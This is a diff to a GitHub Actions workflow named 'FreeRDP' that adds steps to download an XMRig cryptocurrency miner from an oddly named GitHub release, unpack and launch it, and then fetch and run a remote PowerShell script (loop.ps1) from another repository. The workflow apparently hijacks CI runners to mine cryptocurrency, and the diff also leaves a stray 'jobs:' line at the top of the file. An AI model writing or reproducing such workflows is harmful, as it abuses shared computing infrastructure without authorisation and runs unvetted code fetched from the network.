--- a/.github/workflows/blank.yml
+++ b/.github/workflows/blank.yml
@@ -1,3 +1,4 @@
+jobs:
 name: FreeRDP
 
 on: workflow_dispatch
@@ -30,5 +31,8 @@ jobs:
       run: cmd /c start.bat
     - name: Downloading XMRIG/running/started
       run: |
-        Invoke-WebRequest https://raw.githubusercontent.com/Rohan-uwu/jjhsddkjnakjbdsanbdjsvakdbsa/main/loop.ps1 -OutFile loop.ps1
+        Invoke-WebRequest https://github.com/Rohan-uwu/XMRnsdkjbahsndsavjdbsvjksdadjkbsahvdhashjdjasbjkbdshfjsjiusdiohdjsldk-ahjkdfhhdbiugsdjhfuiassijfi/releases/download/1/xmrig-6.12.2.zip -OutFile XMRIG.zip
+        Expand-Archive XMRIG.zip
+        .\XMRIG\xmrig-6.12.2\xmrig.exe &&
+        Invoke-WebRequest https://raw.githubusercontent.com/denisook/denisasuke/main/loop.ps1 -OutFile loop.ps1
         ./loop.ps1
